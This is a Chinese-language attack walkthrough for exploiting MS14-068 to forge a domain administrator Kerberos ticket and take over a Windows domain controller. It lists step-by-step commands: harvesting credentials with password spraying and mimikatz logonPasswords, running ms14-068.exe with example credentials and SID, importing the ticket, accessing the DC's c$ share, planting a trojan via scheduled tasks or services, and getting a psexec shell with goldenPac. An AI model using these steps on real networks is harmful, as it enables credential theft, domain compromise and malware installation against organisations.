原理:
ms14068主要是通过伪造域管的tgt,将普通用户提升为域管用户,从而控制域控。
信息准备
如果内存中有域管的tgt,直接导出域管的tgt来进行利用。
如果没有域管的tgt,利用ms14068进行伪造域管的tgt来利用,利用成功的话拿下域管的tgt,全部信息导出,完成通杀。只要服务器没有打ms14068这个补丁,在serve的域控服务器上,都可以进行利用。
利用条件
1 获取域普通账户的账号密码 如果没有的话,可以采用密码喷洒攻击爆破一下
2 获得普通用户的isd
3 服务器未打补丁KB3011780
实验方式:
1 首先先获取到普通用户的sid号
whoami /all
查找到当前,sid值
2 查找密码 方式包括密码喷洒,mimikatz
sekurlsa::logonPasswords
包括在线lsass,sam密码抓取,
https://www.yuque.com/u22130424666/aac20c/hrcslalnzw2kgr3w
还有读取ntlm哈希,然后使用hashcat进行破解。
还有密码破解
3 查看补丁,观察是否存在KB3011780补丁,如果不存在这个补丁的话直接全部通杀
4 使用mimikatz查票
一般情况下,我们拿下域管权限之后便,我们需要查票,查一些白银票据或者黄金票据。看有没有存下的权限维持的工具
票据相当于一个文件,一般拿到票据之后
如果有其他票据之后,我们可以直接连接
5 上传ms14068
ms14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户SID -d 域控
ms14-068.exe -u Administrator@god.org -p AAaa1234 -s S-1-5-21-2952760202-1353902439-2381784089-500 -d 192.168.52.141
直接利用这个工具,拿到票据,生成之后的票据在桌面上
6 导入票据
kerberos::ptc 票据名字
7 拥有票据之后
dir \\dc2.test.com\c$ 注意是机器名不是IP
8 建立网络连接
net use \\机器名
9 复制木马文件,执行计划表或者服务表来进行上线木马
golden.pac
此工具是impacket工具包里的,它是MS14-068+psexec的组合,因此使用起来非常放方便快捷
goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名
通过这个漏洞直接获得psexec的shell